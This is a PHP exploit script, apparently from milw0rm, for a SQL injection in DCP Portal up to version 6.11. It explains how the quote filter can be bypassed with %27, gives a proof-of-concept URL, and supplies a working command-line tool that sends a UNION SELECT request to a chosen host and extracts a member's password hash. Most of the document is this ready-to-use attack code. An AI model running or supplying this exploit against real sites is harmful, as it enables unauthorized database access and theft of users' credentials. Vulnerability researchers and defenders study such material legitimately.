#!/usr/bin/php -q
<?php
echo "[*]DCP Portal <= 6.11 Remote SQL Injection Exploit\r\n";
echo "[*]Coded by x0kster -x0kster[AT]gmail[DOT]com - \r\n";
/*
Note : Magic Quotes = 0
Script Download : http://www.dcp-portal.org/
Bug in index.php :
<?php
//index.php
[...]
60. $sql = "SELECT id, name FROM $t_cats WHERE cat_id = '".$_GET["cid"]."' ORDER BY sort, name";
[...]
?>
But the script filter the quotes with this code, included in each page of the cms:
<?php
//config/config.inc.php
[...]
118. if (strlen($_SERVER['QUERY_STRING']) > 0) {
119. $str = $_SERVER['QUERY_STRING'];
120. $arr = split('[;&]', URLdecode($str));
121. $pos = strpos($str, "'");
122. if ($pos) {
123. $hackattempt = true; }
[...]
?>
But we can bypass this control using %27 instead ' :-).
So this is the simple PoC:
http://site/path/index.php?cid=-1%27+union+select+1,password+from+dcp5_members+where+uid=1/*
Exploit :
*/
if ($argc<4) {
echo "[*]Usage: php ".$argv[0]." host path id\r\n";
echo "[*]Example:\r\n";
echo "[*]php ".$argv[0]." localhost /dcp-portal/ 1\r\n";
die;
}
function get_response($packet){
global $host, $response;
$socket=fsockopen(gethostbyname($host),80);
if (!$socket) { echo "[-]Error contacting $host.\r\n"; exit();}
fputs($socket,$packet);
$response='';
while (!feof($socket)) {
$response.=fgets($socket);
}
fclose($socket);
}
$host =$argv[1];
$path =$argv[2];
$id = $argv[3];
$packet ="GET ".$path."index.php?cid=-1%27+union+select+1,concat(0x78306b73746572,password,0x78306b73746572)+from+dcp5_members+where+uid=".$id."/*";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
get_response($packet);
if(strstr($response,"x0kster")){
$hash = explode("x0kster",$response,32);
echo "[+]Ok, the hash is : $hash[1]\r\n";
die;
}else{
echo "[-]Exploit filed, maybe fixed or incorrect id.\r\n";
die;
}
?>
# milw0rm.com [2008-01-06]
